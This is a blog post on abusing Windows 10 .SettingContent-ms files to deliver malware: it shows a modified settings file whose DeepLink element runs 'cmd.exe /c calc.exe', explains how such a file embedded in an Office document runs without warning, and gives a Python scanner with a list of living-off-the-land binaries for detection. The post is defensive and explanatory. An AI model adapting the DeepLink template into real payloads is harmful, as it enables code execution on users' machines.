Friday, July 6, 2018

New macro-less technique to distribute malware using .SettingContent-ms

There's a new infection vector that can be tapped into, one that circumvents the current Office protection settings and even Microsoft's new Attack Surface Reduction (ASR) rules, without using macros at all.

The .SettingContent-ms file type was introduced in Windows 10 and lets a user create shortcuts to the various Windows 10 Settings pages. These files are plain XML and contain paths to the Windows settings binaries they open.

A modified ControlPanel.settingcontent-ms file to run calc.exe


<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
 <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
  <ApplicationInformation>
   <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
   <!-- DeepLink is the command the Settings host runs; the genuine file points at %windir%\system32\control.exe -->
   <DeepLink>cmd.exe /c calc.exe</DeepLink>
   <Icon>%windir%\system32\calc.exe</Icon>
  </ApplicationInformation>
  <SettingIdentity>
   <PageID></PageID>
   <HostID>{12B1697E-D3A0-4DBC-B568-CCF64A3F934D}</HostID>
  </SettingIdentity>
  <SettingInformation>
   <Description>@shell32.dll,-4161</Description>
   <Keywords>@shell32.dll,-4161</Keywords>
  </SettingInformation>
 </SearchableContent>
</PCSettings>

This feature can be abused because one of its elements, DeepLink, accepts any binary together with its parameters, and Windows executes it as soon as the file is opened. All an attacker needs to do is replace the expected path (the genuine ControlPanel.settingcontent-ms points at %windir%\system32\control.exe) with their own command, typically launched through cmd.exe or powershell.exe, as in most attacks of this kind.

By embedding a specially crafted settings file into an Office document as an OLE object, an attacker can trick a user into running malicious code without any further warning or notification from Office.


An embedded OLE .settingcontent-ms object that, when clicked, tricks the user into opening the content
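The two abuse points above, the DeepLink element and the OLE-embedded copy inside an Office document, can be checked with one scanner. The Python below is an added example, not code from the original post or from the Malwarebytes or SpecterOps write-ups: it parses a .SettingContent-ms file, classifies its DeepLink against a narrow allowlist (only the control.exe target of the genuine file is treated as benign) and a list of living-off-the-land binaries, and then searches the embedding parts of an Office Open XML package for an embedded copy. The allowlist, the LOLBin list, the sample files and the fake .docx builder are all constructed for the example; the stand-in package is not a real OLE compound file, so only the raw-byte search is exercised there.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Namespace every SettingContent-ms file declares on <SearchableContent>.
SC_NS = "http://schemas.microsoft.com/Search/2013/SettingContent"
SC = "{" + SC_NS + "}"

# The genuine ControlPanel.settingcontent-ms points DeepLink at control.exe;
# keeping the allowlist this narrow is an assumption made for the example.
BENIGN_DEEPLINK = re.compile(r"^%windir%\\system32\\control\.exe$", re.IGNORECASE)

# LOLBins, URLs and UNC paths have no business in a settings shortcut.
SUSPICIOUS_DEEPLINK = re.compile(
    r"\b(cmd|powershell|pwsh|mshta|wscript|cscript|rundll32|regsvr32|"
    r"certutil|bitsadmin|msiexec)(\.exe)?\b|https?://|\\\\",
    re.IGNORECASE,
)

# Directories in which Office Open XML packages store OLE Packager objects.
EMBEDDING_DIRS = ("word/embeddings/", "xl/embeddings/", "ppt/embeddings/")


def analyze_settingcontent(xml_bytes):
    """Classify one .SettingContent-ms document by its DeepLink.
    Returns {"deeplink": ..., "verdict": "benign" | "suspicious" | "review"};
    raises ValueError for anything that is not a SettingContent document."""
    try:
        root = ET.fromstring(xml_bytes)
    except ET.ParseError as exc:
        raise ValueError(f"not well-formed XML: {exc}") from exc
    searchable = root.find(SC + "SearchableContent")
    if root.tag != "PCSettings" or searchable is None:
        raise ValueError("not a SettingContent document")
    node = searchable.find(f"{SC}ApplicationInformation/{SC}DeepLink")
    deeplink = (node.text or "").strip() if node is not None else ""
    if BENIGN_DEEPLINK.match(deeplink):
        verdict = "benign"
    elif SUSPICIOUS_DEEPLINK.search(deeplink):
        verdict = "suspicious"
    else:
        verdict = "review"  # unknown or empty target: hand it to an analyst
    return {"deeplink": deeplink, "verdict": verdict}


def find_settingcontent_blobs(data):
    """Yield every SettingContent XML document stored verbatim inside a blob."""
    pattern = rb"<\?xml[^>]*\?>\s*<PCSettings>.*?</PCSettings>"
    for match in re.finditer(pattern, data, re.DOTALL):
        yield match.group(0)


def scan_office_document(package_bytes):
    """Report SettingContent-ms objects embedded in a .docx/.xlsx/.pptx.
    An OLE Packager object carries the dropped file's bytes as-is, so a
    raw-byte search over each embedding part catches the common case."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(package_bytes)) as pkg:
        for name in pkg.namelist():
            if not name.startswith(EMBEDDING_DIRS):
                continue
            for blob in find_settingcontent_blobs(pkg.read(name)):
                try:
                    findings.append({"part": name, **analyze_settingcontent(blob)})
                except ValueError:
                    continue
    return findings


# Constructed samples, not captured malware: the page's calc.exe variant and
# a DeepLink matching the genuine Windows file.
def _sample(deeplink):
    return f"""<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
 <SearchableContent xmlns="{SC_NS}">
  <ApplicationInformation>
   <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
   <DeepLink>{deeplink}</DeepLink>
   <Icon>%windir%\\system32\\control.exe</Icon>
  </ApplicationInformation>
  <SettingIdentity>
   <PageID></PageID>
   <HostID>{{12B1697E-D3A0-4DBC-B568-CCF64A3F934D}}</HostID>
  </SettingIdentity>
 </SearchableContent>
</PCSettings>""".encode()


MALICIOUS_SAMPLE = _sample("cmd.exe /c calc.exe")
BENIGN_SAMPLE = _sample("%windir%\\system32\\control.exe")


def build_fake_docx(embedded):
    """Constructed stand-in for a .docx with one Packager object: a fake
    header plus the raw file, not a real OLE compound file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("[Content_Types].xml", "<Types/>")
        pkg.writestr("word/document.xml", "<w:document/>")
        pkg.writestr("word/embeddings/oleObject1.bin",
                     b"\x02\x00ControlPanel.settingcontent-ms\x00" + embedded)
    return buf.getvalue()


if __name__ == "__main__":
    print(analyze_settingcontent(MALICIOUS_SAMPLE))
    print(analyze_settingcontent(BENIGN_SAMPLE))
    for hit in scan_office_document(build_fake_docx(MALICIOUS_SAMPLE)):
        print(hit)
```

The "review" verdict is deliberate: a DeepLink that is neither the known-good control.exe path nor an obvious LOLBin is not proof of anything, and an allowlist that only knows one target will flag legitimate shortcuts to other settings binaries for a human to look at. Real Packager objects live in a `\x01Ole10Native` stream inside an OLE compound file, whose sectors need not be contiguous, so for production use walk the stream with a proper CFB parser (for example the olefile module) and feed its bytes to `find_settingcontent_blobs` instead of searching the whole part.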
How to Prevent these Attacks

1) Use my simple hack to force PowerShell to trigger a UAC pop-up, allowing you to deny script launches.
2) https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39 add to AVP 

Sources: 
1. https://blog.malwarebytes.com/threat-analysis/2018/07/new-macro-less-technique-used-distribute-malware/
2. https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39
